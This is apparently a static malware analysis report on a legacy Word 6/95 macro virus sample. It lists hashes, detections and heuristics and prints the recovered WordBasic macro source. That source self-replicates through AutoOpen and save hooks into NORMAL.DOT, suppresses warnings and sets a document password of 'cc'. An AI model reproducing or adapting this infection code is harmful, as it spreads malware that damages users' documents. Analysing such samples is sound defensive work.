Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e51732e81c5a3b71…

MALICIOUS

Office (OLE)

8.0 KB First seen: 2012-06-14
MD5: bc46a41ece664cc506fe52c8e382a93c SHA-1: 364f7ffe576364578af09cfbba42dc5e33425cba SHA-256: e51732e81c5a3b7157706b7a05a83b712eb42fdcbb45e0ec81aae501bf4ddeea
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits legacy WordBasic macro virus markers, specifically identifying it as a "RSN MACRO VIRUS Goat file". The presence of these markers and the ClamAV detection strongly suggest it is a historical malware sample intended to spread via document infection. The document body contains numerous references to macro names and functions typical of older macro viruses.

Heuristics 3

  • ClamAV: Win.Trojan.WME-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.WME-2
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 1840 bytes
SHA-256: b873e7f1727e7344ca886d1f07f794f52f6b6d0569855dbdbbff0c09d4da0231
Preview script
First 1,000 lines of the extracted script
= =  
  25964    
  26465      
REM  MACRO: wss
REM  PURPOSE: Main macro.
REM  This macro was generated by WME
MAIN
Makkop Name$
GlPres
AcPres
Makkop = 0
GlPres = 0
AcPres = 0
REM  Disable NORMAL.DOT write access warnings
@cmd00d1 = 0
REM  Check If we in Global template
I = 1 @cmd80b7 0
@cmd80b8 I , 0 = "wss"
GlPres = 1 REM   Schon erledigt
I
REM  Check if document allready infected
X = @cmd80b7 1
X = 0 * SkAcCheck
I = 1 @cmd80b7 1
@cmd80b8 I , 1 = "wss"
AcPres = 1 REM  Schon erledigt
I
GlPres = 0
@cmd80c2 Name$ = ":DateiSpeichern" , "DateiSpeichern" , 0
@cmd80c2 Name$ = ":DateiSpeichernUnter" , "DateiSpeichernUnter" , 0
@cmd80c2 Name$ = ":AutoOpen" , "AutoOpen" , 0
@cmd80c2 Name$ = ":AutoExec" , "AutoExec" , 0
@cmd80c2 Name$ = ":wss" , "wss" , 0
AcPres = 0
CopyMakros = 1
@cmd80c2 "DateiSpeichern" , Name$ = ":DateiSpeichern" , 0
@cmd80c2 "DateiSpeichernUnter" , Name$ = ":DateiSpeichernUnter" , 0
@cmd80c2 "AutoOpen" , Name$ = ":AutoOpen" , 0
@cmd80c2 "AutoExec" , Name$ = ":AutoExec" , 0
@cmd80c2 "wss" , Name$ = ":wss" , 0
REM  MACRO: AutoExec
REM  PURPOSE: Remove some AV shit (something like as DisableAutoMacros)
REM  This macro was generated by WME
MAIN
REM  MACRO: AutoOpen
REM  PURPOSE: Infect Document or Global template.
REM  This macro was generated by WME
MAIN
, - * NoAuto
REM  Infect document
X = wss @cmd8025
REM  MACRO: DateiSpeichern
REM  PURPOSE: Infect document when it saved
REM  This macro was generated by WME
MAIN
, - * NoSave
@cmd80d6 0 REM  Reenable auto macros processing
REM  Infect document
X = wss @cmd8025
REM  Convert document into template
@cmd0054 = 1
REM  MACRO: DateiSpeichernUnter
REM  PURPOSE: Set password to document when file is saved
REM  This macro was generated by WME
MAIN
dlg @cmd0054
dlg
dlg
REM  Check conditions
@cmd80f2 @cmd80f7 3
REM  Set password "cc"
dlg = "cc"
@cmd0054 dlg

Open this report in the interactive analyzer, or submit your own file for analysis.